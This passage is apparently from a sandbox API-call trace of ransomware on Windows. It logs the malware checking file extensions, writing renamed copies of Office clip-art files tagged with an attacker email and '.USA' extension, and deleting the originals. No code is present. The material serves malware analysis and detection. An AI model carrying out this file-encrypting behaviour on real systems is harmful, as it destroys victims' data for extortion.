Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.640] lstrlenW (lpString=".doc") returned 4 [0271.640] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.640] lstrlenW (lpString=".docx") returned 5 [0271.640] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.640] lstrlenW (lpString=".pdf") returned 4 [0271.640] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.640] lstrlenW (lpString=".xls") returned 4 [0271.641] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.641] lstrlenW (lpString=".xlsx") returned 5 [0271.641] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.641] lstrlenW (lpString=".ppt") returned 4 [0271.641] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.641] lstrlenW (lpString=".zip") returned 4 [0271.641] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.641] lstrlenW (lpString=".rar") returned 4 [0271.641] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString=".bz2") returned 4 [0271.641] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString=".7z") returned 3 [0271.641] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.641] lstrlenW (lpString=".dbf") returned 4 [0271.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.641] lstrlenW (lpString=".1cd") returned 4 [0271.641] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.641] lstrlenW (lpString=".jpg") returned 4 [0271.641] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.641] lstrlenW (lpString=".doc") returned 4 [0271.641] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.641] lstrlenW (lpString=".docx") returned 5 [0271.641] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.641] lstrlenW (lpString=".pdf") returned 4 [0271.642] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.642] lstrlenW (lpString=".xls") returned 4 [0271.642] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.642] lstrlenW (lpString=".xlsx") returned 5 [0271.642] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.642] lstrlenW (lpString=".ppt") returned 4 [0271.642] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.642] lstrlenW (lpString=".zip") returned 4 [0271.642] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.642] lstrlenW (lpString=".rar") returned 4 [0271.642] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.642] lstrlenW (lpString=".bz2") returned 4 [0271.642] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.642] lstrlenW (lpString=".7z") returned 3 [0271.642] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.642] lstrlenW (lpString=".dbf") returned 4 [0271.642] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.642] lstrlenW (lpString=".1cd") returned 4 [0271.642] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 63 [0271.642] lstrlenW (lpString=".jpg") returned 4 [0271.642] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.642] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.642] lstrlenW (lpString="FD01657_.WMF") returned 12 [0271.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.643] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=30414) returned 1 [0271.643] CloseHandle (hObject=0x394) returned 1 [0271.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf")) returned 0x20 [0271.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.643] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.643] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.644] GetLastError () returned 0x0 [0271.644] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x76ce, lpOverlapped=0x0) returned 1 [0271.660] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x76d0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x76d0, lpOverlapped=0x0) returned 1 [0271.661] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.661] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.661] SetEndOfFile (hFile=0x384) returned 1 [0271.661] CloseHandle (hObject=0x384) returned 1 [0271.661] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.661] SetEndOfFile (hFile=0x394) returned 1 [0271.669] CloseHandle (hObject=0x394) returned 1 [0271.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf")) returned 1 [0271.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.670] lstrlenW (lpString=".doc") returned 4 [0271.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.670] lstrlenW (lpString=".docx") returned 5 [0271.670] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.670] lstrlenW (lpString=".pdf") returned 4 [0271.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.670] lstrlenW (lpString=".xls") returned 4 [0271.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.670] lstrlenW (lpString=".xlsx") returned 5 [0271.670] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.670] lstrlenW (lpString=".ppt") returned 4 [0271.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.670] lstrlenW (lpString=".zip") returned 4 [0271.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.670] lstrlenW (lpString=".rar") returned 4 [0271.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.670] lstrlenW (lpString=".bz2") returned 4 [0271.670] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.670] lstrlenW (lpString=".7z") returned 3 [0271.670] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.670] lstrlenW (lpString=".dbf") returned 4 [0271.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.671] lstrlenW (lpString=".1cd") returned 4 [0271.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.671] lstrlenW (lpString=".jpg") returned 4 [0271.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.671] lstrlenW (lpString=".doc") returned 4 [0271.671] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString=".docx") returned 5 [0271.671] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.671] lstrlenW (lpString=".pdf") returned 4 [0271.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString=".xls") returned 4 [0271.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.671] lstrlenW (lpString=".xlsx") returned 5 [0271.671] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.671] lstrlenW (lpString=".ppt") returned 4 [0271.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.671] lstrlenW (lpString=".zip") returned 4 [0271.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.671] lstrlenW (lpString=".rar") returned 4 [0271.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString=".bz2") returned 4 [0271.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.671] lstrlenW (lpString=".7z") returned 3 [0271.671] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.672] lstrlenW (lpString=".dbf") returned 4 [0271.672] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.672] lstrlenW (lpString=".1cd") returned 4 [0271.672] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63 [0271.672] lstrlenW (lpString=".jpg") returned 4 [0271.672] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.672] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.672] lstrlenW (lpString="FD01659_.WMF") returned 12 [0271.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.697] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=31180) returned 1 [0271.697] CloseHandle (hObject=0x328) returned 1 [0271.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf")) returned 0x20 [0271.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.697] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.697] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.698] GetLastError () returned 0x0 [0271.698] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x79cc, lpOverlapped=0x0) returned 1 [0271.706] WriteFile (in: hFile=0x3ac, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x79d0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x79d0, lpOverlapped=0x0) returned 1 [0271.707] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.707] WriteFile (in: hFile=0x3ac, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.707] SetEndOfFile (hFile=0x3ac) returned 1 [0271.707] CloseHandle (hObject=0x3ac) returned 1 [0271.707] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.707] SetEndOfFile (hFile=0x328) returned 1 [0271.709] CloseHandle (hObject=0x328) returned 1 [0271.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf")) returned 1 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.710] lstrlenW (lpString=".doc") returned 4 [0271.710] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".docx") returned 5 [0271.710] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.710] lstrlenW (lpString=".pdf") returned 4 [0271.710] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".xls") returned 4 [0271.710] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.710] lstrlenW (lpString=".xlsx") returned 5 [0271.710] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.710] lstrlenW (lpString=".ppt") returned 4 [0271.710] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.710] lstrlenW (lpString=".zip") returned 4 [0271.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.710] lstrlenW (lpString=".rar") returned 4 [0271.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".bz2") returned 4 [0271.711] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".7z") returned 3 [0271.711] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.711] lstrlenW (lpString=".dbf") returned 4 [0271.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.711] lstrlenW (lpString=".1cd") returned 4 [0271.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.711] lstrlenW (lpString=".jpg") returned 4 [0271.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.711] lstrlenW (lpString=".doc") returned 4 [0271.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".docx") returned 5 [0271.711] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.711] lstrlenW (lpString=".pdf") returned 4 [0271.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".xls") returned 4 [0271.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.711] lstrlenW (lpString=".xlsx") returned 5 [0271.711] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.711] lstrlenW (lpString=".ppt") returned 4 [0271.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.711] lstrlenW (lpString=".zip") returned 4 [0271.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.711] lstrlenW (lpString=".rar") returned 4 [0271.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.712] lstrlenW (lpString=".bz2") returned 4 [0271.712] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.712] lstrlenW (lpString=".7z") returned 3 [0271.712] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.712] lstrlenW (lpString=".dbf") returned 4 [0271.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.712] lstrlenW (lpString=".1cd") returned 4 [0271.712] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 63 [0271.712] lstrlenW (lpString=".jpg") returned 4 [0271.712] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.712] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.712] lstrlenW (lpString="FD02071_.WMF") returned 12 [0271.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.712] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2188) returned 1 [0271.712] CloseHandle (hObject=0x328) returned 1 [0271.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf")) returned 0x20 [0271.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.713] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.713] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.714] GetLastError () returned 0x0 [0271.714] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x88c, lpOverlapped=0x0) returned 1 [0271.719] WriteFile (in: hFile=0x3ac, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x890, lpOverlapped=0x0) returned 1 [0271.720] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.720] WriteFile (in: hFile=0x3ac, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.720] SetEndOfFile (hFile=0x3ac) returned 1 [0271.720] CloseHandle (hObject=0x3ac) returned 1 [0271.720] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.720] SetEndOfFile (hFile=0x328) returned 1 [0271.722] CloseHandle (hObject=0x328) returned 1 [0271.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf")) returned 1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.723] lstrlenW (lpString=".doc") returned 4 [0271.723] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString=".docx") returned 5 [0271.723] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.723] lstrlenW (lpString=".pdf") returned 4 [0271.723] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString=".xls") returned 4 [0271.723] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.723] lstrlenW (lpString=".xlsx") returned 5 [0271.723] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.723] 